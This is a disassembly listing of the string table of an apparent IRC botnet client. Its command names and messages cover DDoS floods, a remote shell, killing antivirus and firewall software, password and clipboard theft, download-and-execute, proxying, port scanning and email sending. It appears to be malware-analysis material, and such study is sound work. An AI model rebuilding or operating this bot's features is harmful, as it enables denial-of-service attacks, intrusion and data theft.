aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_4089DC+50CB�o
align 4
aFtpFileNotFoun db '[FTP]: File not found: %s.',0 ; DATA XREF: sub_4089DC+5072�o
align 4
aUpload db 'upload',0 ; DATA XREF: sub_4089DC+504C�o
align 4
aHcon db 'hcon',0 ; DATA XREF: sub_4089DC+502B�o
align 4
aHttpcon db 'httpcon',0 ; DATA XREF: sub_4089DC+5017�o
aMainInvalidLog db '[MAIN]: Invalid login slot number: %d.',0 ; DATA XREF: sub_4089DC+4F51�o
align 4
aMainNoUserLogg db '[MAIN]: No user logged in at slot: %d.',0 ; DATA XREF: sub_4089DC+4F49�o
align 4
aMainS db '[MAIN]: %s',0 ; DATA XREF: sub_4089DC+4EED�o
align 4
aSecureFailedTo db '[SECURE]: Failed to start secure thread, error: <%d>.',0
; DATA XREF: sub_4089DC+4EC3�o
; sub_40E6BB+3DE�o
align 10h
aSecureSSystem_ db '[SECURE]: %s system.',0 ; DATA XREF: sub_4089DC+4E5F�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_4089DC+4E59�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_4089DC+4E52�o
align 10h
aSocks4FailedTo db '[SOCKS4]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4089DC+4DC4�o
align 4
aSocks4ServerSt db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_4089DC+4D6B�o
; sub_410FF6+A1�o
aFindfile_0 db '[FINDFILE]',0 ; DATA XREF: sub_4089DC+4C9D�o
align 4
aFindFile db 'Find file',0 ; DATA XREF: sub_4089DC+4C98�o
align 4
aProc db '[PROC]',0 ; DATA XREF: sub_4089DC+4C88�o
align 4
aProcessList db 'Process list',0 ; DATA XREF: sub_4089DC+4C83�o
align 4
aMainReconnecti db '[MAIN]: Reconnecting.',0 ; DATA XREF: sub_4089DC+4C4D�o
align 4
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_4089DC:loc_40D61C�o
align 4
aMainDisconnect db '[MAIN]: Disconnecting.',0 ; DATA XREF: sub_4089DC+4C2B�o
align 4
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_4089DC:loc_40D5FA�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+4BF5�o
align 4
aMainStatusRead db '[MAIN]: Status: Ready. Bot Uptime: %s.',0 ; DATA XREF: sub_4089DC+4BA7�o
align 10h
aMainBotIdS_ db '[MAIN]: Bot ID: %s.',0 ; DATA XREF: sub_4089DC+4B68�o
aThreadsFaile_0 db '[THREADS]: Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_4089DC+4B35�o
align 4
aThreadsListThr db '[THREADS]: List threads.',0 ; DATA XREF: sub_4089DC+4AD4�o
align 4
aSub db 'sub',0 ; DATA XREF: sub_4089DC+4AB2�o
aMainAliasList_ db '[MAIN]: Alias list.',0 ; DATA XREF: sub_4089DC+4A5C�o
aLogFailedToSta db '[LOG]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_4089DC+4A2C�o
aLogListingLog_ db '[LOG]: Listing log.',0 ; DATA XREF: sub_4089DC+49D1�o
aMainNetworkInf db '[MAIN]: Network Info.',0 ; DATA XREF: sub_4089DC+492A�o
align 10h
aMainSystemInfo db '[MAIN]: System Info.',0 ; DATA XREF: sub_4089DC+48FA�o
align 4
aMainRemovingBo db '[MAIN]: Removing Bot.',0 ; DATA XREF: sub_4089DC+48A6�o
align 10h
aProcsFailedToS db '[PROCS]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_4089DC+4830�o
align 4
aProcsProccessL db '[PROCS]: Proccess list.',0 ; DATA XREF: sub_4089DC+47CF�o
aFull db 'full',0 ; DATA XREF: sub_4089DC+47B3�o
align 4
aProcAlreadyRun db '[PROC]: Already running.',0 ; DATA XREF: sub_4089DC+474D�o
align 4
aMainUptimeS_ db '[MAIN]: Uptime: %s.',0 ; DATA XREF: sub_4089DC+46F9�o
aCmdRemoteShe_0 db '[CMD]: Remote shell ready.',0 ; DATA XREF: sub_4089DC:loc_40D047�o
align 4
aCmdCouldnTOpen db '[CMD]: Couldn',27h,'t open remote shell.',0
; DATA XREF: sub_4089DC+4661�o
align 4
aCmdRemoteShell db '[CMD]: Remote shell already running.',0 ; DATA XREF: sub_4089DC+4642�o
align 10h
aMainGetClipboa db '[MAIN]: Get Clipboard.',0 ; DATA XREF: sub_4089DC+462C�o
align 4
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_4089DC+45FD�o
align 4
aFlushdnsFail_1 db '[FLUSHDNS]: Failed to flush ARP cache.',0
; DATA XREF: sub_4089DC:loc_40CFC7�o
align 4
aFlushdnsArpC_0 db '[FLUSHDNS]: ARP cache flushed.',0 ; DATA XREF: sub_4089DC+45D6�o
align 4
aFlushdnsFail_0 db '[FLUSHDNS]: Failed to load dnsapi.dll.',0
; DATA XREF: sub_4089DC:loc_40CF96�o
align 4
aFlushdnsFailed db '[FLUSHDNS]: Failed to flush DNS cache.',0
; DATA XREF: sub_4089DC:loc_40CF8F�o
align 4
aFlushdnsDnsCac db '[FLUSHDNS]: DNS cache flushed.',0 ; DATA XREF: sub_4089DC+45AC�o
align 4
aRlogindFailedT db '[RLOGIND]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4089DC+453E�o
align 4
aRlogindServerL db '[RLOGIND]: Server listening on IP: %s:%d, Username: %s.',0
; DATA XREF: sub_4089DC+44E5�o
aHttpdFailedT_1 db '[HTTPD]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4089DC+4405�o
align 4
aTftpFailedTo_0 db '[TFTP]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4089DC+427B�o
aTftpAlreadyRun db '[TFTP]: Already running.',0 ; DATA XREF: sub_4089DC+415E�o
align 4
aFindpassFail_0 db '[FINDPASS]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_4089DC+4130�o
aFindpassSearch db '[FINDPASS]: Searching for password.',0 ; DATA XREF: sub_4089DC+40CD�o
aScanFailedTo_1 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_4089DC+4092�o
; sub_4089DC+57AD�o
align 4
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_4089DC+3FCA�o
; sub_4089DC+59FE�o
db 'for %d minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_4089DC+3F9F�o
; sub_4089DC+59D3�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_4089DC+3F98�o
; sub_4089DC+59CC�o
align 10h
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_4089DC+3DC1�o
; sub_4089DC+5675�o
align 4
aMainNickChange db '[MAIN]: Nick changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4089DC+3D5D�o
align 4
aMainJoinedCh_0 db '[MAIN]: Joined channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4089DC+3D40�o
align 4
aMainPartedChan db '[MAIN]: Parted channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4089DC+3D1F�o
align 4
aMainIrcRawS_ db '[MAIN]: IRC Raw: %s.',0 ; DATA XREF: sub_4089DC+3D05�o
align 4
aThreadsFailedT db '[THREADS]: Failed to kill thread: %s.',0
; DATA XREF: sub_4089DC:loc_40C668�o
align 4
aThreadsKilledT db '[THREADS]: Killed thread: %s.',0 ; DATA XREF: sub_4089DC+3C85�o
align 4
aThreadsNoActiv db '[THREADS]: No active threads found.',0
; DATA XREF: sub_4089DC:loc_40C61C�o
aThreadsStopped db '[THREADS]: Stopped: %d thread(s).',0 ; DATA XREF: sub_4089DC+3C36�o
align 4
aAll db 'all',0 ; DATA XREF: sub_4089DC+3C20�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+3B93�o
; sub_4089DC:loc_40D5E3�o
align 4
aMainPrefixChan db '[MAIN]: Prefix changed to: ',27h,'%c',27h,'.',0
; DATA XREF: sub_4089DC+3B12�o
align 4
aShellCouldnTOp db '[SHELL]: Couldn',27h,'t open file: %s',0
; DATA XREF: sub_4089DC:loc_40C4D5�o
aShellFileOpene db '[SHELL]: File opened: %s',0 ; DATA XREF: sub_4089DC+3AEF�o
align 4
aMainServerChan db '[MAIN]: Server changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4089DC+3ABA�o
align 4
aDnsCouldnTReso db '[DNS]: Couldn',27h,'t resolve hostname.',0 ; DATA XREF: sub_4089DC+3A92�o
align 10h
aDnsLookupSS_ db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_4089DC+3A7C�o
align 4
aProcFailedTo_0 db '[PROC]: Failed to terminate process: %s',0
; DATA XREF: sub_4089DC:loc_40C409�o
aProcProcessK_1 db '[PROC]: Process killed: %s',0 ; DATA XREF: sub_4089DC+3A26�o
align 10h
aProcProcessK_0 db '[PROC]: Process killed & deleted: %s',0 ; DATA XREF: sub_4089DC+39DE�o
align 4
aProcFailedToTe db '[PROC]: Failed to terminate process ID: %s',0
; DATA XREF: sub_4089DC:loc_40C35B�o
align 4
aProcProcessKil db '[PROC]: Process killed ID: %s',0 ; DATA XREF: sub_4089DC+3978�o
align 4
aFileDeletedS_0 db '[FILE]: Deleted ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4089DC+3921�o
align 4
aFileListS db '[FILE]: List: %s',0 ; DATA XREF: sub_4089DC+38FC�o
align 10h
aMircCommandSen db '[mIRC]: Command sent.',0 ; DATA XREF: sub_4089DC:loc_40C280�o
align 4
aMircClientNotO db '[mIRC]: Client not open.',0 ; DATA XREF: sub_4089DC+389D�o
align 4
aCmdCommandsS db '[CMD]: Commands: %s',0 ; DATA XREF: sub_4089DC+385D�o
aCmdErrorSendin db '[CMD]: Error sending to remote shell.',0 ; DATA XREF: sub_4089DC+3855�o
align 10h
aMainReadFileFa db '[MAIN]: Read file failed: %s',0 ; DATA XREF: sub_4089DC+37FE�o
align 10h
aMainReadFileCo db '[MAIN]: Read file complete: %s',0 ; DATA XREF: sub_4089DC+37E8�o
align 10h
aMainGethostS_ db '[MAIN]: Gethost: %s.',0 ; DATA XREF: sub_4089DC+3765�o
align 4
aMainUnableToEx db '[MAIN]: Unable to extract Gethost command.',0
; DATA XREF: sub_4089DC:loc_40C0FD�o
align 4
aMainGethostSCo db '[MAIN]: Gethost: %s, Command: %s',0 ; DATA XREF: sub_4089DC+370B�o
align 4
aMainAliasAdded db '[MAIN]: Alias added: %s.',0 ; DATA XREF: sub_4089DC+3656�o
align 4
aMainPrivmsgSS_ db '[MAIN]: Privmsg: %s: %s.',0 ; DATA XREF: sub_4089DC+3613�o
align 10h
aMainActionSS_ db '[MAIN]: Action: %s: %s.',0 ; DATA XREF: sub_4089DC+35A8�o
aMainCycle_ db '[MAIN]: Cycle.',0 ; DATA XREF: sub_4089DC+3528�o
align 4
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+34EC�o
; sub_4089DC+3D0F�o
align 4
aMainModeChange db '[MAIN]: Mode change: %s',0 ; DATA XREF: sub_4089DC+34C7�o
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+34B9�o
align 4
aCloneRawSS db '[CLONE]: Raw (%s): %s',0 ; DATA XREF: sub_4089DC+348D�o
align 10h
aCloneModeSS db '[CLONE]: Mode (%s): %s',0 ; DATA XREF: sub_4089DC+341E�o
align 4
aModeS db 'MODE %s',0 ; DATA XREF: sub_4089DC+33C6�o
aCloneNickSS db '[CLONE]: Nick (%s): %s',0 ; DATA XREF: sub_4089DC+3393�o
align 4
aNickS db 'NICK %s',0 ; DATA XREF: sub_4089DC+333A�o
; sub_4089DC+3B5A�o
aJoinSS db 'JOIN %s %s',0 ; DATA XREF: sub_4089DC+3319�o
align 4
aS_5 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+32E5�o
; sub_4089DC+3372�o ...
align 4
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_4089DC+32AC�o
aMainRepeatNotA db '[MAIN]: Repeat not allowed in command line: %s',0
; DATA XREF: sub_4089DC:loc_40BC75�o
align 4
aMainRepeatS db '[MAIN]: Repeat: %s',0 ; DATA XREF: sub_4089DC+325E�o
align 10h
aMainDelay_ db '[MAIN]: Delay.',0 ; DATA XREF: sub_4089DC:loc_40BBA7�o
align 10h
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_4089DC+3187�o
; sub_4089DC+3238�o ...
align 10h
aUpdateFailedTo db '[UPDATE]: Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_4089DC+30FE�o
aUpdateDownload db '[UPDATE]: Downloading update from: %s.',0 ; DATA XREF: sub_4089DC+309F�o
align 10h
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_4089DC+2FF8�o
align 4
aExecCommandsS db '[EXEC]: Commands: %s',0 ; DATA XREF: sub_4089DC+2F74�o
align 4
aExecCouldnTExe db '[EXEC]: Couldn',27h,'t execute file.',0 ; DATA XREF: sub_4089DC+2F61�o
align 4
aFindfileFailed db '[FINDFILE]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_4089DC+2EAD�o
aFindfileSear_0 db '[FINDFILE]: Searching for file: %s in: %s.',0
; DATA XREF: sub_4089DC+2E49�o
align 4
aFile db '[FILE]:',0 ; DATA XREF: sub_4089DC:loc_40B783�o
; sub_4089DC:loc_40C304�o
aFileRenameSToS db '[FILE]: Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4089DC+2D8F�o
align 10h
aIcmpInvalidFlo db '[ICMP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_4089DC+2D46�o
align 4
aIcmpFailedToSt db '[ICMP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4089DC+2D1E�o
align 4
aIcmpFloodingSF db '[ICMP]: Flooding: (%s) for %s seconds.',0 ; DATA XREF: sub_4089DC+2CAE�o
align 10h
aClonesFailedTo db '[CLONES]: Failed to start clone thread, error: <%d>.',0
; DATA XREF: sub_4089DC+2C22�o
align 4
aClonesCreatedO db '[CLONES]: Created on %s:%d, in channel %s.',0
; DATA XREF: sub_4089DC+2BBF�o
align 4
aDdosFailedToSt db '[DDoS]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4089DC+2B0F�o
align 4
aDdosFloodingSS db '[DDoS]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_4089DC+2AA5�o
align 4
aSynFailedToSta db '[SYN]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4089DC+2A11�o
align 4
aSynFloodingSSF db '[SYN]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_4089DC+29A7�o
align 4
aDownloadFailed db '[DOWNLOAD]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_4089DC+28FF�o
align 10h
aDownloadDown_1 db '[DOWNLOAD]: Downloading URL: %s to: %s.',0 ; DATA XREF: sub_4089DC+28A0�o
aRedirectFailed db '[REDIRECT]: Failed to start redirection thread, error: <%d>.',0
; DATA XREF: sub_4089DC+2782�o
align 4
aRedirectTcpRed db '[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.',0
; DATA XREF: sub_4089DC+2727�o
aScanFailedTo_0 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_4089DC+2685�o
; sub_4089DC+4029�o ...
align 4
aScanPortScanSt db '[SCAN]: Port scan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_4089DC+262A�o
align 4
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_4089DC+25A4�o
align 4
aSSS_2 db '[%s] * %s %s',0 ; DATA XREF: sub_4089DC+2489�o
align 4
dword_426F6C dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_4089DC+23F6�o
; sub_4089DC+3583�o
dword_426F78 dd 615F63h ; DATA XREF: sub_4089DC+2374�o
aC_action db 'c_action',0 ; DATA XREF: sub_4089DC+2364�o
align 4
aC_pm db 'c_pm',0 ; DATA XREF: sub_4089DC+2350�o
align 10h
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_4089DC+233C�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_4089DC+2328�o
align 10h
aScan db 'scan',0 ; DATA XREF: sub_4089DC+2314�o
align 4
aRd db 'rd',0 ; DATA XREF: sub_4089DC+2300�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_4089DC+22EC�o
align 4
aDl db 'dl',0 ; DATA XREF: sub_4089DC+22D8�o
align 4
aDownload db 'download',0 ; DATA XREF: sub_4089DC+22C4�o
align 4
aSyn db 'syn',0 ; DATA XREF: sub_4089DC+22B0�o
; sub_4089DC+522C�o ...
aSynflood db 'synflood',0 ; DATA XREF: sub_4089DC+229C�o
align 4
aC: ; DATA XREF: sub_4089DC+224C�o
; sub_413E26+73�o
unicode 0, <c>,0
aClone_0 db 'clone',0 ; DATA XREF: sub_4089DC+2238�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_4089DC+2212�o
align 4
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_4089DC+21FE�o
align 4
aMv db 'mv',0 ; DATA XREF: sub_4089DC+21EA�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_4089DC+21D6�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_4089DC+21C2�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_4089DC+21AE�o
align 4
aE: ; DATA XREF: sub_4089DC+219A�o
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_4089DC+2186�o
aUpdate db 'update',0 ; DATA XREF: sub_4089DC+215E�o
align 4
aDe db 'de',0 ; DATA XREF: sub_4089DC+214A�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_4089DC+2136�o
align 4
aRp db 'rp',0 ; DATA XREF: sub_4089DC+2122�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_4089DC+210E�o
; sub_4089DC+3216�o
align 10h
aC_p db 'c_p',0 ; DATA XREF: sub_4089DC+20FA�o
aC_part db 'c_part',0 ; DATA XREF: sub_4089DC+20E6�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_4089DC+20D2�o
aC_join db 'c_join',0 ; DATA XREF: sub_4089DC+20BE�o
align 4
aC_n db 'c_n',0 ; DATA XREF: sub_4089DC+20AA�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_4089DC+2096�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_4089DC+2082�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_4089DC+206E�o
align 10h
aC_r db 'c_r',0 ; DATA XREF: sub_4089DC+205A�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_4089DC+2046�o
align 4
aM: ; DATA XREF: sub_4089DC+2032�o
unicode 0, <m>,0
aMode db 'mode',0 ; DATA XREF: sub_4089DC+201E�o
align 4
aCy db 'cy',0 ; DATA XREF: sub_4089DC+200A�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_4089DC+1FF6�o
align 4
aA_1: ; DATA XREF: sub_4089DC+1FE2�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_4089DC+1FCE�o
align 10h
aPm_0 db 'pm',0 ; DATA XREF: sub_4089DC+1FBA�o
align 4
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_4089DC+1FA6�o
aAa db 'aa',0 ; DATA XREF: sub_4089DC+1F92�o
align 10h
aAddalias db 'addalias',0 ; DATA XREF: sub_4089DC+1F7E�o
align 4
aAvfwFailedToSt db '[AVFW]: Failed to start AV/FW killer thread, error: <%d>.',0
; DATA XREF: sub_4089DC+1F06�o
align 4
aAvfw db '[AVFW]',0 ; DATA XREF: sub_4089DC+1EAC�o
; sub_4089DC+1F5E�o
align 10h
aKillerThread db 'Killer Thread',0 ; DATA XREF: sub_4089DC+1EA7�o
; sub_4089DC+1F59�o
align 10h
aAvfwAvFwBotKil db '[AVFW]: AV/FW/BOT Killer active.',0 ; DATA XREF: sub_4089DC+1E91�o
align 4
aAvfwkiller db 'avfwkiller',0 ; DATA XREF: sub_4089DC+1E66�o
align 10h
aGh db 'gh',0 ; DATA XREF: sub_4089DC+1E52�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_4089DC+1E3E�o
aNetCommandUnkn db '[NET]: Command unknown.',0 ; DATA XREF: sub_4089DC:loc_40A806�o
aNetNoMessageSp db '[NET]: No message specified.',0 ; DATA XREF: sub_4089DC:loc_40A7FF�o
align 4
aNetUserListFai db '[NET]: User list failed.',0 ; DATA XREF: sub_4089DC:loc_40A7B2�o
align 10h
aNetUserListCom db '[NET]: User list completed.',0 ; DATA XREF: sub_4089DC+1DCC�o
aNetShareListFa db '[NET]: Share list failed.',0 ; DATA XREF: sub_4089DC:loc_40A710�o
align 4
aNetShareListCo db '[NET]: Share list completed.',0 ; DATA XREF: sub_4089DC+1D2A�o
align 4
aShare db 'share',0 ; DATA XREF: sub_4089DC+1CBE�o
align 10h
aContinue db 'continue',0 ; DATA XREF: sub_4089DC+1C8A�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_4089DC+1C73�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_4089DC+1C5C�o
; sub_4089DC+1F40�o
align 4
aNetServiceLi_0 db '[NET]: Service list failed.',0 ; DATA XREF: sub_4089DC:loc_40A62A�o
aNetServiceList db '[NET]: Service list completed.',0 ; DATA XREF: sub_4089DC+1C44�o
align 4
aStart db 'start',0 ; DATA XREF: sub_4089DC+1BF1�o
; sub_4089DC+1E7B�o
align 10h
aNetFailedToLoa db '[NET]: Failed to load advapi32.dll or netapi32.dll.',0
; DATA XREF: sub_4089DC+1BB7�o
aNet db 'net',0 ; DATA XREF: sub_4089DC+1B95�o
aRf db 'rf',0 ; DATA XREF: sub_4089DC+1B81�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_4089DC+1B6D�o
align 4
aCm db 'cm',0 ; DATA XREF: sub_4089DC+1B59�o
align 4
aCmd db 'cmd',0 ; DATA XREF: sub_4089DC+1B45�o
aMirc db 'mirc',0 ; DATA XREF: sub_4089DC+1B31�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_4089DC+1B1D�o
aLi db 'li',0 ; DATA XREF: sub_4089DC+1B09�o
align 4
aList_0 db 'list',0 ; DATA XREF: sub_4089DC+1AF5�o
align 4
aDel db 'del',0 ; DATA XREF: sub_4089DC+1AE1�o
aDelete db 'delete',0 ; DATA XREF: sub_4089DC+1ACD�o
; sub_4089DC+1CA4�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_4089DC+1AB9�o
align 4
aKill db 'kill',0 ; DATA XREF: sub_4089DC+1AA5�o
align 4
aKdp db 'kdp',0 ; DATA XREF: sub_4089DC+1A91�o
aKilldelproc db 'killdelproc',0 ; DATA XREF: sub_4089DC+1A7D�o
aKp db 'kp',0 ; DATA XREF: sub_4089DC+1A69�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_4089DC+1A55�o
align 4
aDn db 'dn',0 ; DATA XREF: sub_4089DC+1A41�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_4089DC+1A2D�o
aSe db 'se',0 ; DATA XREF: sub_4089DC+1A19�o
align 10h
aO: ; DATA XREF: sub_4089DC+19F1�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_4089DC+19DD�o
; sub_4089DC+3AD6�o ...
align 4
aPr db 'pr',0 ; DATA XREF: sub_4089DC+19C9�o
align 10h
aPrefix db 'prefix',0 ; DATA XREF: sub_4089DC+19B5�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_4089DC+19A1�o
align 10h
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_4089DC+198D�o
align 4
aC_q db 'c_q',0 ; DATA XREF: sub_4089DC+1979�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_4089DC+1965�o
align 4
aK: ; DATA XREF: sub_4089DC+1951�o
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_4089DC+193D�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_4089DC+1915�o
aPt db 'pt',0 ; DATA XREF: sub_4089DC+1901�o
align 10h
aPart_0 db 'part',0 ; DATA XREF: sub_4089DC+18ED�o
align 4
aJ: ; DATA XREF: sub_4089DC+18D9�o
unicode 0, <j>,0
aJoin db 'join',0 ; DATA XREF: sub_4089DC+18C5�o
align 4
aN: ; DATA XREF: sub_4089DC+18B1�o
unicode 0, <n>,0
aNick_0 db 'nick',0 ; DATA XREF: sub_4089DC+189D�o
align 10h
aScanall db 'scanall',0 ; DATA XREF: sub_4089DC+1863�o
aFp db 'fp',0 ; DATA XREF: sub_4089DC+184F�o
align 4
aFindpass db 'findpass',0 ; DATA XREF: sub_4089DC+183B�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_4089DC+1827�o
align 10h
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_4089DC+1813�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_4089DC+17FF�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_4089DC+17EB�o
align 10h
aRlogin db 'rlogin',0 ; DATA XREF: sub_4089DC+17D7�o
align 4
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_4089DC+17C3�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_4089DC+17AF�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_4089DC+179B�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_4089DC+1787�o
align 10h
aFlushdns db 'flushdns',0 ; DATA XREF: sub_4089DC+1773�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_4089DC+175F�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_4089DC+174B�o
align 10h
aGc db 'gc',0 ; DATA XREF: sub_4089DC+1737�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_4089DC+1723�o
aEmailMessageSe db '[EMAIL]: Message sent to %s.',0 ; DATA XREF: sub_4089DC+16D9�o
align 10h
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_4089DC+1658�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a_: ; DATA XREF: sub_4089DC+15B8�o
unicode 0, <_>,0
aEmail db 'email',0 ; DATA XREF: sub_4089DC+154D�o
align 4
aTcp db 'tcp',0 ; DATA XREF: sub_4089DC+1539�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_4089DC+1525�o
align 4
aP: ; DATA XREF: sub_4089DC+1511�o
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_4089DC+14FD�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_4089DC+14E9�o
align 10h
aU: ; DATA XREF: sub_4089DC+14D5�o
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_4089DC+14C1�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_4089DC+14AD�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_4089DC+1499�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_4089DC+1485�o
aMainLoginListC db '[MAIN]: Login list complete.',0 ; DATA XREF: sub_4089DC+1461�o
align 10h
aD_S db '%d. %s',0 ; DATA XREF: sub_4089DC+142D�o
; sub_412305+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_4089DC+1420�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_4089DC+13FD�o
align 10h
aWho db 'who',0 ; DATA XREF: sub_4089DC+13E4�o
aCmd_0 db '[CMD]',0 ; DATA XREF: sub_4089DC+13D6�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_4089DC+13D1�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_4089DC+13BC�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_4089DC+13A8�o
align 4
aOpencmd db 'opencmd',0 ; DATA XREF: sub_4089DC+1394�o
aDll db 'dll',0 ; DATA XREF: sub_4089DC+1380�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_4089DC+136C�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_4089DC+1358�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_4089DC+1344�o
align 4
aUp db 'up',0 ; DATA XREF: sub_4089DC+1330�o
; sub_4089DC+2172�o
align 4
aUptime db 'uptime',0 ; DATA XREF: sub_4089DC+131C�o
align 10h
aPs db 'ps',0 ; DATA XREF: sub_4089DC+1308�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_4089DC+12F4�o
align 4
aErradicate db 'erradicate',0 ; DATA XREF: sub_4089DC+12E0�o
align 4
aDestroy db 'destroy',0 ; DATA XREF: sub_4089DC+12CC�o
aSi db 'si',0 ; DATA XREF: sub_4089DC+12B8�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_4089DC+12A4�o
aNi db 'ni',0 ; DATA XREF: sub_4089DC+1290�o
align 10h
aNetinfo db 'netinfo',0 ; DATA XREF: sub_4089DC+127C�o
aClg db 'clg',0 ; DATA XREF: sub_4089DC+1268�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_4089DC+1254�o
align 4
aLg db 'lg',0 ; DATA XREF: sub_4089DC+1240�o
align 4
